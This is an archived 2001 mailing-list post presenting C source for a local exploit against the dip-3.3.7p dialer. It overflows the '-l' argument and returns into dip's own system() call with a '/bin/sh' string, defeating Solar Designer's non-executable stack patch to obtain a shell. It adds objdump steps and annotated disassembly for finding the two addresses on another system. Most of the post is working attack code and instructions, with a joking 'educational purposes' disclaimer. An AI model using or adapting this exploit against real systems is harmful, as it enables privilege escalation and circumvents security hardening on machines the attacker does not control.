Hi, While playing around with dip-3.3.7p I realized that the method I used in my previous posting won't do. So I had a look at the source and developed a new program. Here it goes: ------------------- sammeltonne.c ------------------- /* * Programm to get a shell from dip-3.3.7p on a system with * Solar Designer's stackpatch installed. * by tstroegeat_private-erlangen.de * * Of course this is just for educational purposes too :) */ #define SOMETEXT 0x0804cee5 /* address of text system call */ #define CMDSTR 0x08054f0e /* address where command string should be */ #define DIP "/usr/sbin/dip" /* path of dip */ int main(int argc, char *argv[]) { char mem[256], *ptr; char *name[]={ DIP, "-k", "-l", mem, (char *)0 }; int i, code[]={ SOMETEXT, CMDSTR, 0 }; int off=117; if (argc > 1) off=atoi(argv[1]); for (ptr=mem, i=0; i < 256; i++) *ptr++='a'; ptr=mem+off; strcpy(ptr, (char *)&(code[0])); mem[255]=0; execve(name[0], name, 0); return 0; } ----------------------------------------------- SOMETEXT: address in text segment where system is called. CMDSTR: address in text segment where a suitable command string is stored (dip is nice enough to have a /bin/sh string in its code). The both addresses will be different on your system, so here is a way to find them out: ... objdump --disassemble-all /usr/sbin/dip ... Now search for the following pattern: ... 0804ced4 pushl %ebx 0804ced5 pushl $0x8054848 0804ceda pushl $0x6 0804cedc call 08049678 0804cee1 addl $0xc,%esp 0804cee4 pushl %ebx -->0804cee5 call 080493c8 SOMETEXT 0804ceea addl $0x4,%esp 0804ceed testl %eax,%eax 0804ceef jne 0804cf9e 0804cef5 pushl %esi 0804cef6 movl 0x8(%ebp),%eax 0804cef9 movl 0x660(%eax),%eax 0804ceff pushl %eax ... 0804eefd leal 0xfffffc00(%ebp),%eax 0804ef03 pushl %eax 0804ef04 pushl $0x8054f08 0804ef09 pushl $0x8054f0b 0804ef0e pushl $0x8054f0e<-- CMDSTR 0804ef13 call 08049368 0804ef18 pushl $0x7f 0804ef1a call 08049768 0804ef1f nop ... tst.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:50 PDT